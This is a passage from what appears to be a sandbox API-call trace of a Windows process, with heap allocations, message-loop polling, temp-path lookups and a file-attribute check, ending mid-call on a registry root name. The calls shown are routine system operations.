0x2e54ce8 [0282.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0282.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0282.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0282.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0282.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0282.958] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0283.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0283.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0283.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0283.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0283.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0283.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0283.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0283.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0283.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0283.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0283.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0283.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0283.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0283.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0283.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0283.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0283.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0283.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0283.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0283.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0283.038] FreeLibrary (hLibModule=0x750c0000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0283.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0283.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0283.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0283.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0283.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0283.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0283.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0283.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0283.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0283.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0283.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0283.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0283.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0283.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0283.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0283.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0283.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0283.042] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0283.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0283.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0283.042] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0283.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0283.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0283.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0283.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0283.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0283.043] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0283.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0283.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0283.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0283.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0283.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0283.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0283.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0283.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0283.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0283.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0283.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0283.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0283.043] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0283.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0283.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0283.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0283.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0283.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0283.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0283.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0283.044] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0283.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0283.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0283.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0283.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0283.044] timeGetTime () returned 0x1186e49 [0283.044] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.044] Sleep (dwMilliseconds=0xa) [0283.181] timeGetTime () returned 0x1186ed1 [0283.181] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.181] Sleep (dwMilliseconds=0xa) [0283.293] timeGetTime () returned 0x1186f43 [0283.293] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.293] Sleep (dwMilliseconds=0xa) [0283.497] timeGetTime () returned 0x118700f [0283.497] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0283.498] TranslateMessage (lpMsg=0x8cf798) returned 0 [0283.498] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0283.498] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0283.498] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0283.498] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.498] Sleep (dwMilliseconds=0xa) [0283.633] timeGetTime () returned 0x1187097 [0283.634] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.634] Sleep (dwMilliseconds=0xa) [0283.716] timeGetTime () returned 0x11870e9 [0283.716] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.716] Sleep (dwMilliseconds=0xa) [0283.776] timeGetTime () returned 0x1187124 [0283.776] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.776] Sleep (dwMilliseconds=0xa) [0283.801] timeGetTime () returned 0x118713e [0283.801] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.801] Sleep (dwMilliseconds=0xa) [0283.847] timeGetTime () returned 0x118716c [0283.847] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.847] Sleep (dwMilliseconds=0xa) [0283.892] timeGetTime () returned 0x1187198 [0283.892] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.892] Sleep (dwMilliseconds=0xa) [0283.931] timeGetTime () returned 0x11871bf [0283.931] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.931] Sleep (dwMilliseconds=0xa) [0283.967] timeGetTime () returned 0x11871e3 [0283.967] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0283.967] Sleep (dwMilliseconds=0xa) [0284.003] timeGetTime () returned 0x1187209 [0284.003] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.003] Sleep (dwMilliseconds=0xa) [0284.046] timeGetTime () returned 0x1187233 [0284.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0284.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0284.046] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0284.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0284.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0284.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0284.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0284.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0284.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0284.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0284.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0284.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0284.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0284.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0284.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0284.047] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0284.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0284.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0284.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0284.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0284.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0284.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0284.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0284.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0284.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0284.048] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: 